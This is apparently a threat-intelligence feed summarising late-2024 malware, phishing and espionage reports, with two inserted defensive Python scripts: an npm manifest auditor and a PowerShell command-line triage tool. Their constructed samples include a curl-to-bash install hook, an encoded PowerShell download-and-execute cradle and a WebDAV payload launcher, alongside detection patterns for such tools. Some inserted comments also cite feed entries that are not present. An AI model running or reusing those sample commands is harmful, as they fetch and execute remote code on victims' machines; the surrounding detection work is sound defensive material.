BI.ZONE researchers have identified a new threat actor, Venture Wolf, active since November 2023. The group uses multiple loaders to deliver MetaStealer, an infostealer, and focuses on manufacturing, construction, IT, and telecommunications companies. Venture Wolf distributes archives containing a loader with a .com or .exe extension alongside one or more decoy documents. The loader either creates a .NET file to inject the malicious code into or injects it into a legitimate Windows process to avoid detection. JPG, PNG, PDF, DOC/DOCX, and ODT files are used as decoys to trick users into running the malware.
Source: https://bi.zone/eng/expertise/blog/venture-wolf-ispolzuet-metastealer-v-atakakh-na-rossiyskie-kompanii/
2024-11-05
North_Korean_Keylogger_Targets_US_Organizations
LOW
+
Intel Source:
Hybrid Analysis
Intel Name:
North_Korean_Keylogger_Targets_US_Organizations
Date of Scan:
2024-11-05
Impact:
LOW
Summary:
Hybrid Analysis researchers have examined a new North Korean keylogger attributed to the Andariel group (also known as APT45, Silent Chollima, and Onyx Sleet) and linked to targeted attacks against U.S. organizations. The malware logs keystrokes and mouse activity and stores the data in a password-protected, encrypted archive.
Source: https://hybrid-analysis.blogspot.com/2024/11/recent-keylogger-attributed-to-north.html?m=1
2024-11-05
Bing_Phishing_Targets_Banking_Credentials
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Bing_Phishing_Targets_Banking_Credentials
Date of Scan:
2024-11-05
Impact:
LOW
Summary:
Malwarebytes researchers have identified banking-credential phishing surfacing in Microsoft Bing, with malicious URLs appearing among the top search results for "Keybank login". The phishing sites are built to bypass two-factor authentication; Malwarebytes reported them to Microsoft promptly.
Source: https://www.malwarebytes.com/blog/scams/2024/11/crooks-bank-on-microsofts-search-engine-to-phish-customers
2024-11-05
Stealc_Malware
LOW
+
Intel Source:
SonicWall
Intel Name:
Stealc_Malware
Date of Scan:
2024-11-05
Impact:
LOW
Summary:
SonicWall researchers have examined a sample of Stealc, an infostealer that steals credentials from browsers, cryptocurrency wallets, and file-sharing servers. Stealc monitors user activity by tracking processes, keystrokes, active windows, and mouse clicks; it can also disable security products and adjust network settings to enable proxy connections. It additionally fingerprints the system's hardware, Windows settings, and even the monitor resolution.
Source: https://blog.sonicwall.com/en-us/2024/11/stealc-malware-checks-everything-even-the-screen-resolution/
2024-11-05
Phishing_Scams_Targeting_E_commerce_Shoppers
LOW
+
Intel Source:
Linkedin
Intel Name:
Phishing_Scams_Targeting_E_commerce_Shoppers
Date of Scan:
2024-11-05
Impact:
LOW
Summary:
During the Diwali festival, cybercriminals are exploiting online shopping sales such as Flipkart's Big Diwali 2024 sale by creating phishing websites that lure shoppers with fake offers, for example an iPhone for only Rs 800. The fraudulent sites are designed to steal personal information and money. While around 2,000 such websites have been identified, over 5,000 new phishing sites were created in the past month, many of them specifically targeting mobile users. The scams exploit the festival shopping rush to catch unsuspecting victims.
Source: https://www.linkedin.com/posts/mohit-kumar-4ab6b3bb_phishing-flipkart-scam-activity-7255197010411053057-FZ8Z?utm_source=share&utm_medium=member_desktop
2024-11-05
Supply_Chain_Attack_Targets_Developers
LOW
+
Intel Source:
Checkmarx
Intel Name:
Supply_Chain_Attack_Targets_Developers
Date of Scan:
2024-11-05
Impact:
LOW
Summary:
Checkmarx researchers have discovered a supply chain attack in the npm ecosystem that uses Ethereum smart contracts to distribute C2 server addresses. The typosquatting campaign targets developers and spreads cross-platform malware for Windows, Linux, and macOS. It abuses npm preinstall scripts to execute information-stealing payloads and establish persistence on compromised devices.
Source: https://checkmarx.com/blog/supply-chain-attack-using-ethereum-smart-contracts-to-distribute-multi-platform-malware/
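The Socket entry (typosquatted package names) and the Checkmarx entry above (preinstall scripts) describe the two checks a developer can run before installing a package. The following is example code added to this feed, not Socket's or Checkmarx's tooling; the allowlist in KNOWN_PACKAGES and the three manifests are constructed for illustration.

```python
"""Audit an npm package manifest for typosquatted names and install-time
lifecycle scripts. Example code added to this feed, not Socket's or Checkmarx's
tooling; the allowlist and the manifests below are constructed for illustration."""
import json
import re

# Hooks npm runs automatically during `npm install`, before any code is imported.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed allowlist; in practice compare against a registry snapshot or your lockfile.
KNOWN_PACKAGES = {"lodash", "express", "axios", "node-fetch", "dotenv", "chalk"}

# Tokens that have no business in the install hook of a typical library.
RISKY_TOKENS = re.compile(r"curl|wget|powershell|bash\s+-c|node\s+-e|base64|https?://|eval\(", re.I)


def edit_distance(a, b):
    """Levenshtein distance, used to spot names one or two keystrokes from a known package."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def closest_known(name, known=KNOWN_PACKAGES, max_distance=2):
    """Return the known package this name imitates, or None if it is known or not close."""
    if name in known:
        return None
    best = min(known, key=lambda k: edit_distance(name, k))
    return best if edit_distance(name, best) <= max_distance else None


def audit_manifest(manifest_json, known=KNOWN_PACKAGES):
    """Return a list of findings for one package.json; an empty list means nothing stood out."""
    pkg = json.loads(manifest_json)
    findings = []
    name = pkg.get("name", "")
    near = closest_known(name, known)
    if near:
        findings.append(f"name '{name}' is within edit distance 2 of '{near}' (possible typosquat)")
    for hook in INSTALL_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if cmd is None:
            continue
        # Native add-ons legitimately use install hooks, so report presence and
        # escalate only when the hook fetches or evaluates remote content.
        tag = "risky" if RISKY_TOKENS.search(cmd) else "present"
        findings.append(f"{hook} hook {tag}: {cmd}")
    return findings


# Constructed manifests (not real packages)
TYPOSQUAT_MANIFEST = json.dumps({
    "name": "lodahs", "version": "4.17.21",
    "scripts": {"preinstall": "node -e \"require('child_process').exec('curl -s https://example.invalid/x.sh | bash')\""},
})
NATIVE_MANIFEST = json.dumps({"name": "native-addon-demo", "version": "1.0.0",
                              "scripts": {"install": "node-gyp rebuild"}})
BENIGN_MANIFEST = json.dumps({"name": "my-internal-tool", "version": "0.1.0",
                              "scripts": {"test": "jest"}})

if __name__ == "__main__":
    for m in (TYPOSQUAT_MANIFEST, NATIVE_MANIFEST, BENIGN_MANIFEST):
        print(json.loads(m)["name"], "->", audit_manifest(m) or ["clean"])
```

Because lifecycle hooks run before any of the package's code is ever imported, the cheapest mitigation is to install with `npm install --ignore-scripts` (or set `ignore-scripts=true` in `.npmrc`) and only re-enable scripts for the native add-ons that genuinely need them.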
2024-11-05
Advanced_DNS_Hijacking_Detection
LOW
+
Intel Source:
Palo Alto
Intel Name:
Advanced_DNS_Hijacking_Detection
Date of Scan:
2024-11-05
Impact:
LOW
Summary:
Palo Alto Networks Unit 42 researchers have developed a method for detecting DNS hijacking that identified over 6,700 incidents between March and September 2024. The approach uses machine learning to analyze millions of passive DNS records every day and surfaces hijacks within minutes.
Source: https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/
2024-11-05
Decrypting_and_Analyzing_an_Encrypted_Phishing_PDF
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Decrypting_and_Analyzing_an_Encrypted_Phishing_PDF
Date of Scan:
2024-11-05
Impact:
LOW
Summary:
SANS ISC researchers have published a detailed analysis of an encrypted phishing PDF. The diary walks through examining the file and shows how attackers use PDF encryption to slip past traditional security filters, then explains how to decrypt the PDF, review its contents, and identify the malicious tactics, such as the social engineering lure and the payload delivery mechanism.
Source: https://isc.sans.edu/diary/Analyzing+an+Encrypted+Phishing+PDF/31404/
2024-11-04
Threat_Actor_Exposed_in_Cortex_XDR_Attempt
LOW
+
Intel Source:
Palo Alto
Intel Name:
Threat_Actor_Exposed_in_Cortex_XDR_Attempt
Date of Scan:
2024-11-04
Impact:
LOW
Summary:
Palo Alto Networks Unit 42 researchers have documented an unusual incident in which a threat actor's failed attempt to disable Cortex XDR gave important insight into their operations. The investigation, which began with an extortion attempt, found that the actor gained access to the client's network through the Atera RMM platform, using access purchased from an initial access broker.
Source: https://unit42.paloaltonetworks.com/edr-bypass-extortion-attempt-thwarted/
2024-11-04
Unveiling_APT36_and_the_Evolution_of_ElizaRAT
LOW
+
Intel Source:
Checkpoint
Intel Name:
Unveiling_APT36_and_the_Evolution_of_ElizaRAT
Date of Scan:
2024-11-04
Impact:
LOW
Summary:
Check Point researchers have profiled the Pakistan-based cyber-espionage group Transparent Tribe, also known as APT36, which frequently targets Indian government, diplomatic, and military entities with ElizaRAT, a Windows-based remote access tool. ElizaRAT is spread through phishing emails carrying malicious Control Panel (CPL) files hosted on Google Drive, and it uses cloud services such as Google Drive, Telegram, and Slack for C2 communication. It also deploys a secondary payload, ApoloStealer, designed to steal specific file types from the compromised machine.
Source: https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/
2024-11-04
ToxicPanda_Targets_Europe_and_LATAM
LOW
+
Intel Source:
Cleafy
Intel Name:
ToxicPanda_Targets_Europe_and_LATAM
Date of Scan:
2024-11-04
Impact:
LOW
Summary:
Cleafy researchers have uncovered an Android banking trojan campaign called ToxicPanda. The malware is a remote access trojan that enables attackers to take over accounts directly from the compromised device using On-Device Fraud (ODF), which bypasses bank security controls such as identity verification and behavioural detection. Researchers identified about 1,500 compromised devices across Italy, Portugal, Spain, and Latin America. The operators appear to be Chinese speakers, who have rarely targeted Europe and Latin America for banking fraud, so the campaign marks an expansion of their targeting into these regions.
Source: https://www.cleafy.com/cleafy-labs/toxicpanda-a-new-banking-trojan-from-asia-hit-europe-and-latam
2024-11-04
Vidar_strikes_in_Italy_through_compromised_PECs
LOW
+
Intel Source:
CERT-AGID
Intel Name:
Vidar_strikes_in_Italy_through_compromised_PECs
Date of Scan:
2024-11-04
Impact:
LOW
Summary:
CERT-AGID researchers have identified a new malspam campaign distributing the Vidar stealer through phishing emails sent from compromised PEC (Posta Elettronica Certificata, Italy's certified email) accounts. The emails appear to come from a legitimate Italian company and warn recipients about an unpaid invoice. They contain a link disguised as the word "Invoice"; clicking it downloads a malicious VBS file that kicks off the infection chain.
Source: https://cert-agid.gov.it/news/vidar-torna-a-colpire-in-italia-attraverso-pec-compromesse/
2024-11-04
North_Korean_Groups_Using_SliverC2_in_Attacks
LOW
+
Intel Source:
Linkedin
Intel Name:
North_Korean_Groups_Using_SliverC2_in_Attacks
Date of Scan:
2024-11-04
Impact:
LOW
Summary:
Recent intelligence indicates that the North Korean threat actor group Jumpy Pisces uses Sliver C2 in its attacks, with specific IP addresses linked to both Sliver C2 and BianLian ransomware. Notably, these IPs have also been observed in connection with APT45 activity. Additionally, the Lazarus Group has been found to have ties to BianLian ransomware as of 2023. The evidence suggests that the ransomware group is leveraging Sliver C2 as part of its operational toolkit.
Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_daily-huntsliver-c2-at-main-theravenfile-activity-7257635183527383041--0hN?utm_source=share&utm_medium=member_desktop
2024-11-04
Ukraine_CERT_Alerts_on_Tax_Phishing_Campaign
LOW
+
Intel Source:
CERT-UA
Intel Name:
Ukraine_CERT_Alerts_on_Tax_Phishing_Campaign
Date of Scan:
2024-11-04
Impact:
LOW
Summary:
On October 28, 2024, CERT-UA identified a widespread phishing campaign involving emails that mimic requests from the State Tax Service. The emails carry PDF attachments that lead to the download of a malicious, password-protected RAR archive containing an executable disguised as a document. When opened, it displays a decoy document while silently installing the LiteManager remote management tool, giving the attackers unauthorized access to the victim's computer. The attack is financially motivated and attributed to the UAC-0050 group.
Source: https://cert.gov.ua/article/6281202
2024-11-04
APT37_Threat_Actor
MEDIUM
+
Intel Source:
Genians
Intel Name:
APT37_Threat_Actor
Date of Scan:
2024-11-04
Impact:
MEDIUM
Summary:
Genians researchers have identified a North Korean state-sponsored cyber-espionage group, APT37, conducting espionage operations and cyberattacks against South Korean entities. Its main targets are individuals and organizations connected to North Korean human rights, defector networks, journalists covering North Korea, and experts in national defense and foreign affairs. The group uses reconnaissance tactics to gather details such as IP addresses, browser, and operating system data, and deploys RokRAT malware via shortcut (.lnk) files; RokRAT can steal documents and phone recordings from compromised devices.
Source: https://www.genians.co.kr/blog/threat_intelligence/apt37_recon
2024-11-04
CRONTRAP_Campaign
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
CRONTRAP_Campaign
Date of Scan:
2024-11-04
Impact:
MEDIUM
Summary:
Securonix researchers have discovered the CRON#TRAP campaign, which starts with a phishing email that tricks the victim into downloading a malicious shortcut (.lnk) file. This file sets up a hidden Linux environment on the victim's machine using QEMU, a legitimate virtualization tool. The emulated Linux environment comes preconfigured with Chisel, a tunnelling tool that automatically connects to the attackers' C2 server. The attackers modify system startup scripts and add SSH keys so that their access survives reboots. They also define custom commands that let them interact directly with the host system from inside the environment, supporting lateral movement and data exfiltration.
Source: https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/
2024-11-04
October_Malspam_Campaigns
MEDIUM
+
Intel Source:
silence-is-best
Intel Name:
October_Malspam_Campaigns
Date of Scan:
2024-11-04
Impact:
MEDIUM
Summary:
Aggregation of October 2024 malspam campaign details shared by researcher silence-is-best.
Source: https://gist.github.com/silence-is-best/2688f9486b0447bc128949289d27bfae
2024-11-04
Contagious_Interview_and_WageMole_Campaigns
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
Contagious_Interview_and_WageMole_Campaigns
Date of Scan:
2024-11-04
Impact:
MEDIUM
Summary:
Zscaler researchers have uncovered two campaigns, Contagious Interview and WageMole, run by North Korean threat actors seeking remote jobs in Western countries. Contagious Interview focuses on stealing personal and financial data, while WageMole uses the stolen information to secure remote employment through social engineering. The attackers typically begin with fake job postings on LinkedIn aimed at sectors such as information technology, healthcare, retail, and financial services. They use the BeaverTail (JavaScript) and InvisibleFerret (Python) malware to steal source code, cryptocurrency data, and personal information from victims, and they build fake identities (including forged passports and driver's licenses) from the stolen data. Both Windows and macOS systems are targeted.
Source: https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west
2024-11-02
Phish_N_Ships
MEDIUM
+
Intel Source:
Satori
Intel Name:
Phish_N_Ships
Date of Scan:
2024-11-02
Impact:
MEDIUM
Summary:
The Satori Threat Intelligence team recently exposed and disrupted a sophisticated online fraud scheme, named "Phish ’n’ Ships," which used fake e-commerce websites to trick consumers into purchasing popular but hard-to-find items. The scheme involved infecting legitimate websites to create fake product listings, which were optimized to rank high in search results and lure consumers to fake online stores. Once there, consumers were prompted to enter credit card details via seemingly legitimate payment processors, only to find that no product would ever be delivered. Phish ’n’ Ships, operational since 2019, infected over 1,000 websites and established 121 fraudulent stores, leading to millions of dollars in consumer losses.
Source: https://www.humansecurity.com/learn/blog/satori-threat-intelligence-alert-phish-n-ships-fakes-online-shops-to-steal-money-and-credit-card-information
2024-11-02
SharePoint_Compromise_Investigation
MEDIUM
+
Intel Source:
Rapid7
Intel Name:
SharePoint_Compromise_Investigation
Date of Scan:
2024-11-02
Impact:
MEDIUM
Summary:
In October 2024, Rapid7's Incident Response team investigated a significant breach involving a Microsoft Exchange service account with domain administrator privileges, which led to unauthorized access across the network and a total domain compromise that went undetected for two weeks. The initial access vector was traced to the exploitation of CVE-2024-38094, a vulnerability in an on-premises SharePoint server, which allowed the attacker to deploy a webshell and execute various malicious tools. Key tactics included installing unauthorized software, notably the Horoung Antivirus, to disable existing security measures, and lateral movement supported by tools such as Mimikatz and Fast Reverse Proxy (FRP) for credential gathering and persistence.
Source: https://www.rapid7.com/blog/post/2024/10/30/investigating-a-sharepoint-compromise-ir-tales-from-the-field/
2024-11-02
LUNARSPIDER_Ransomware_Attacks
MEDIUM
+
Intel Source:
EclecticIQ
Intel Name:
LUNARSPIDER_Ransomware_Attacks
Date of Scan:
2024-11-02
Impact:
MEDIUM
Summary:
EclecticIQ analysts uncovered a malvertising campaign linked to the Russian-speaking threat actor group LUNAR SPIDER, which is leveraging an obfuscated JavaScript downloader named Latrodectus to distribute Brute Ratel C4 malware, specifically targeting the financial sector. This campaign illustrates LUNAR SPIDER's adaptability following law enforcement actions that previously disrupted their operations, demonstrating their ability to shift from IcedID malware to more sophisticated tools. Analysts have identified LUNAR SPIDER's role as an initial access broker within a broader cybercrime ecosystem, collaborating with other ransomware groups like ALPHV (BlackCat) and WIZARD SPIDER to enhance their operational efficiency.
Source: https://blog.eclecticiq.com/inside-intelligence-center-lunar-spider-enabling-ransomware-attacks-on-financial-sector-with-brute-ratel-c4-and-latrodectus
2024-11-01
Strela_Stealer
LOW
+
Intel Source:
Cyble
Intel Name:
Strela_Stealer
Date of Scan:
2024-11-01
Impact:
LOW
Summary:
Cyble researchers have discovered a phishing campaign in which attackers use fake invoice notifications to lure users into opening malicious emails. The campaign primarily targets Central and Southwestern Europe, especially Germany and Spain. Each email carries a ZIP archive containing JavaScript files that embed a PowerShell command, which downloads and runs the malware directly from a WebDAV server without writing it to disk. The payload then launches Strela Stealer, which steals sensitive email client data such as server configurations, usernames, passwords, and system details, giving attackers both credential access and potential entry points for further attacks.
Source: https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/
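The Strela Stealer entry above (PowerShell fetching a payload from a WebDAV share) and the earlier Black Basta entry (encoded commands and covert execution switches) both come down to the same triage question for a process-creation log: what does this PowerShell command line actually do once the switches and the Base64 are unwrapped? The following is example code added to this feed, not ThreatDown's or Cyble's detection logic; the command lines in SAMPLE_CMDLINES are constructed, and the scoring weights and threshold are arbitrary choices for illustration.

```python
"""Triage PowerShell command lines for encoded commands, covert execution
switches, download cradles and payloads fetched over WebDAV. Example code added
to this feed; SAMPLE_CMDLINES are constructed, not taken from any report."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of a switch (-w, -win,
# -WindowStyle), so the patterns allow prefixes. Name -> (pattern, weight).
INDICATORS = {
    "hidden_window": (re.compile(r"-w\w*\s+hidden", re.I), 2),
    "policy_bypass": (re.compile(r"-e\w*\s+(?:bypass|unrestricted)", re.I), 2),
    "no_profile": (re.compile(r"-nop\w*", re.I), 1),
    "download_cradle": (re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I), 2),
    "invoke_expression": (re.compile(r"\biex\b|invoke-expression", re.I), 2),
    # \\host@SSL@443\DavWWWRoot\... UNC paths are served by the WebDAV mini-redirector.
    "webdav_unc": (re.compile(r"\\\\[\w.\-]+(?:@ssl)?(?:@\d+)?\\davwwwroot", re.I), 3),
}
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
ENCODED_WEIGHT = 2
SUSPICIOUS_SCORE = 4  # arbitrary threshold for this example


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Score one command line; the decoded script is scanned with the visible switches."""
    encoded = ENCODED_RE.search(cmdline) is not None
    decoded = decode_encoded_command(cmdline)
    # Replace the Base64 blob so its characters cannot trip the other patterns.
    visible = ENCODED_RE.sub("-EncodedCommand <blob>", cmdline)
    text = visible + ("\n" + decoded if decoded else "")
    hits = [name for name, (rx, _w) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[h][1] for h in hits)
    if encoded:
        hits.insert(0, "encoded_command")
        score += ENCODED_WEIGHT
    return {"hits": hits, "score": score, "decoded": decoded,
            "verdict": "suspicious" if score >= SUSPICIOUS_SCORE else "benign"}


# Constructed samples: a beacon-style cradle, a WebDAV launcher, and an admin one-liner.
CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand "
    + base64.b64encode(CRADLE_SCRIPT.encode("utf-16-le")).decode("ascii"),
    r"powershell.exe -w hidden -c Start-Process \\203.0.113.20@8080\DavWWWRoot\inv\run.exe",
    r"powershell.exe -NoProfile -Command Get-ChildItem C:\Temp",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        r = triage(c)
        print(r["verdict"], r["score"], r["hits"])
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

The point of decoding before scoring is that a command line with only `-EncodedCommand` looks empty to a plain string match; the cradle, the `IEX`, and the URL only appear once the UTF-16LE script is recovered. Abbreviated switches (`-e`, `-ec`, `-nop`, `-w 1`) are accepted by powershell.exe and are what operators actually type, so a rule that only matches the long spellings misses them.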
2024-11-01
Unmasking_SYS01_Infostealer
MEDIUM
+
Intel Source:
Bitdefender
Intel Name:
Unmasking_SYS01_Infostealer
Date of Scan:
2024-11-01
Impact:
MEDIUM
Summary:
Bitdefender Labs researchers have identified a malvertising campaign in which cybercriminals abuse Meta's advertising platform to spread the SYS01 infostealer, which steals personal data. The malware is delivered as an Electron.js application, with the attackers impersonating well-known brands and software such as CapCut, Office 365, and Netflix to lure users into downloading it. The campaign mainly targets men aged 45 and above across the EU, North America, Australia, and Asia, and uses nearly a hundred malicious domains both to distribute the malware and to manage the attacks in real time.
Source: https://www.bitdefender.com/en-us/blog/labs/unmasking-the-sys01-infostealer-threat-bitdefender-labs-tracks-global-malvertising-campaign-targeting-meta-business-pages/
2024-11-01
PythonRatLoader
MEDIUM
+
Intel Source:
Cofense
Intel Name:
PythonRatLoader
Date of Scan:
2024-11-01
Impact:
MEDIUM
Summary:
Cofense researchers have uncovered a phishing campaign that distributes several remote access trojans: VenomRAT, XWorm, AsyncRAT, and DCRat. The attack relies on multiple layers of obfuscation and evasion. It starts with an email that uses urgent language to get the victim to open a malicious attachment, which kicks off a chain that drops an internet shortcut file on the victim's machine. This shortcut points the user to a remote server over WebDAV, giving access to the files hosted there.
Source: https://cofense.com/blog/pythonratloader-the-proprietor-of-xworm-and-friends
2024-11-01
Pygmy_Goat_Backdoor
MEDIUM
Intel Source:
NCSC
Intel Name:
Pygmy_Goat_Backdoor
Date of Scan:
2024-11-01
Impact:
MEDIUM
Summary:
The UK’s National Cyber Security Centre (NCSC) has revealed the existence of a sophisticated backdoor, named Pygmy Goat, found on compromised Sophos XG firewall devices, indicating that the malware is also designed to target various Linux-based network devices. Pygmy Goat employs stealth techniques to disguise malicious activity as legitimate traffic, including the use of encrypted ICMP packets for covert communication. This malware, which appears to have originated with Fortinet devices, highlights the sophistication of the attackers, as it features multiple communication methods and remote shell capabilities. The revelation follows Sophos's admission of facing ongoing targeted attacks from Chinese government-backed hackers, which included sophisticated exploits and the deployment of custom implants for monitoring.
Source: https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/pygmy-goat/ncsc-mar-pygmy-goat.pdf
2024-10-31
Pacific_Rim_Timeline
MEDIUM
Intel Source:
Sophos
Intel Name:
Pacific_Rim_Timeline
Date of Scan:
2024-10-31
Impact:
MEDIUM
Summary:
Sophos' latest report details the counter-offensive strategies employed to combat China-based cyber threats, highlighting the sophisticated tactics used by attackers for surveillance, sabotage, and espionage. The report identifies novel exploits and customized malware, revealing similarities in tactics, tools, and procedures with prominent Chinese nation-state groups such as Volt Typhoon, APT31, and APT41. The targeted entities include critical infrastructure and government facilities across South and Southeast Asia, encompassing sensitive sites like nuclear energy suppliers, airports, military hospitals, and government ministries, emphasizing the ongoing risk posed by these sophisticated adversaries.
Source: https://news.sophos.com/en-us/2024/10/31/pacific-rim-timeline/
2024-10-31
Typosquat_Campaign_Targeting_Puppeteer_Users
LOW
Intel Source:
Phylum
Intel Name:
Typosquat_Campaign_Targeting_Puppeteer_Users
Date of Scan:
2024-10-31
Impact:
LOW
Summary:
The Phylum Research Team uncovered an ongoing typosquatting campaign targeting developers of the popular Puppeteer library and other packages. The attacker initially published a test package, which contained a post-install hook meant to execute a malicious JavaScript file, though it was missing from the package. Subsequent packages included obfuscated code that fetched and executed binaries from a dynamically obtained IP address via an Ethereum smart contract. This strategy allows the attacker to evade detection while collecting system information from infected machines. Following the initial releases, over 100 additional typosquatted packages emerged, highlighting a concerted effort to exploit developer trust in open-source software.
Source: https://blog.phylum.io/supply-chain-security-typosquat-campaign-targeting-puppeteer-users/
2024-10-31
Xiu_Gou_Phishing_Kit
MEDIUM
Intel Source:
Netcraft
Intel Name:
Xiu_Gou_Phishing_Kit
Date of Scan:
2024-10-31
Impact:
MEDIUM
Summary:
Netcraft's research has unveiled the Xiū Gǒu phishing kit, actively used since September 2024 to launch campaigns targeting victims in the US, UK, Spain, Australia, and Japan. This kit has been linked to over 2,000 phishing websites impersonating various brands, including government and banking services, often utilizing engaging features like a branded mascot to enhance user experience. The kit employs a modern tech stack, including Vue.js and Golang, and incorporates Telegram bots for credential exfiltration, making detection challenging.
Source: https://www.netcraft.com/blog/doggo-threat-actor-analysis/
2024-10-31
New_Tradecraft_of_Emennet_Pasargad
MEDIUM
Intel Source:
FBI
Intel Name:
New_Tradecraft_of_Emennet_Pasargad
Date of Scan:
2024-10-31
Impact:
MEDIUM
Summary:
The FBI and U.S. Department of Treasury have issued a Cybersecurity Advisory to alert network defenders about the Iranian cyber group Emennet Pasargad, operating under the name Aria Sepehr Ayandehsazan (ASA). This group, also known by various private sector names, has adopted new cyber tradecraft to conduct information operations through mid-2024, notably during the 2024 Summer Olympics, including a breach of a French dynamic display provider. ASA has also focused on harvesting content from IP cameras and leveraging online AI resources. Since 2023, the group has utilized fictitious hosting resellers to establish operational infrastructure, with recent reports indicating an interest in targeting election-related websites and media outlets for potential influence operations.
Source: https://www.ic3.gov/CSA/2024/241030.pdf
2024-10-31
LummaStealerUpdate
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
LummaStealerUpdate
Date of Scan:
2024-10-31
Impact:
MEDIUM
Summary:
Cisco Talos has reported a phishing campaign targeting Facebook business and advertising account users in Taiwan, where an unknown threat actor uses copyright infringement as a lure to distribute information-stealing malware. The attackers employ decoy emails that mimic legal notifications from companies, encouraging recipients to download malicious files disguised as PDFs. Utilizing Google’s Appspot.com and Dropbox for delivery, the malware evades detection through techniques such as code obfuscation and resource manipulation. Notably, the campaign features two types of information stealers, LummaC2 and Rhadamanthys, both capable of extracting sensitive data while implementing sophisticated evasion strategies to avoid antivirus detection and ensure persistence on infected systems.
Source: https://blog.talosintelligence.com/threat-actors-use-copyright-infringement-phishing-lure-to-deploy-infostealers/
2024-10-30
Cryptocurrency_Scammers_Target_Job_Seekers
LOW
Intel Source:
Proofpoint
Intel Name:
Cryptocurrency_Scammers_Target_Job_Seekers
Date of Scan:
2024-10-30
Impact:
LOW
Summary:
Proofpoint researchers have observed that the scammers known for Pig Butchering cryptocurrency fraud are now shifting to fake job scams to target a wider audience. Pig Butchering schemes take a long time to lure a victim into investing in fake cryptocurrency with the promise of big profits, but the scammers are now targeting financially insecure individuals with smaller payouts. The scam often starts through social media, SMS, and messaging apps, with fake recruiters offering work-from-home jobs and luring victims with easy tasks such as reviewing products, boosting music streams, or writing hotel reviews. Once the victim registers on a fake website and shares a screenshot, they are assigned tasks. However, the ultimate goal is to convince the victim to invest money into the fraudulent platform.
Source: https://www.proofpoint.com/us/blog/threat-insight/pig-butchers-join-gig-economy-cryptocurrency-scammers-target-job-seekers
2024-10-30
Jumpy_Pisces_Engages_in_Play_Ransomware
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Jumpy_Pisces_Engages_in_Play_Ransomware
Date of Scan:
2024-10-30
Impact:
MEDIUM
Summary:
Palo Alto researchers have uncovered a North Korean state-sponsored threat group, called Jumpy Pisces, that belongs to the Reconnaissance General Bureau of the Korean People’s Army. Jumpy Pisces, also known as Andariel and PLUTONIUM, primarily focuses on cyberespionage, financial theft, and ransomware attacks, including custom-developed ransomware such as Maui. The group is believed to be shifting its tactics by collaborating with the Play ransomware group, either as an initial access broker (IAB) or as an affiliate. The attackers use several tools, such as the Sliver framework for C2, DTrack for data theft, and Mimikatz to steal credentials. They also deploy malware to collect browser history and credit card data.
Source: https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomware/
2024-10-30
Exploitation_of_CVE_2023_22527_for_Cryptomining
LOW
Intel Source:
Trend Micro
Intel Name:
Exploitation_of_CVE_2023_22527_for_Cryptomining
Date of Scan:
2024-10-30
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered that attackers are using the Atlassian Confluence vulnerability CVE-2023-22527 to enable remote code execution for cryptomining on the Titan Network. Attackers exploited public IP lookup services and system commands to acquire information about the compromised devices. They used numerous shell scripts to install Titan binaries and connect the workstations to the Cassini Testnet, where they participated in the delegated proof of stake system to collect reward tokens.
Source: https://www.trendmicro.com/en_us/research/24/j/titan-network.html
2024-10-30
Investment_Scams_and_Phishing_via_FUNNULL_CDN
LOW
Intel Source:
Silent Push
Intel Name:
Investment_Scams_and_Phishing_via_FUNNULL_CDN
Date of Scan:
2024-10-30
Impact:
LOW
Summary:
Researchers from Silent Push have discovered the "Triad Nexus," a malicious domain cluster on the FUNNULL CDN that hosts scams, bogus trading apps, and gambling sites associated with the Lazarus Group. With over 200,000 DGA-enabled hostnames, FUNNULL enables phishing attacks and a polyfill.io supply chain attack that affects over 110,000 websites.
Source: https://www.silentpush.com/blog/triad-nexus-funnull/
2024-10-30
BugSleep_RAT
LOW
Intel Source:
Cisco Talos
Intel Name:
BugSleep_RAT
Date of Scan:
2024-10-30
Impact:
LOW
Summary:
Researchers from Cisco Talos have analyzed the Remote Access Tool (RAT) named MuddyRot, also known as BugSleep. This tool provides attackers with remote access by establishing a C2 connection. It uses various methods to communicate over TCP, enabling attackers to run commands, transfer files, and maintain access. BugSleep hides its activities by encrypting messages and using obfuscation to evade detection. When it connects to a server, it sends a message that contains the device’s name and username. The server can respond with commands such as Ping to confirm the connection, or initiate a reverse shell, which allows attackers to run commands remotely.
Source: https://blog.talosintelligence.com/writing-a-bugsleep-c2-server/
2024-10-30
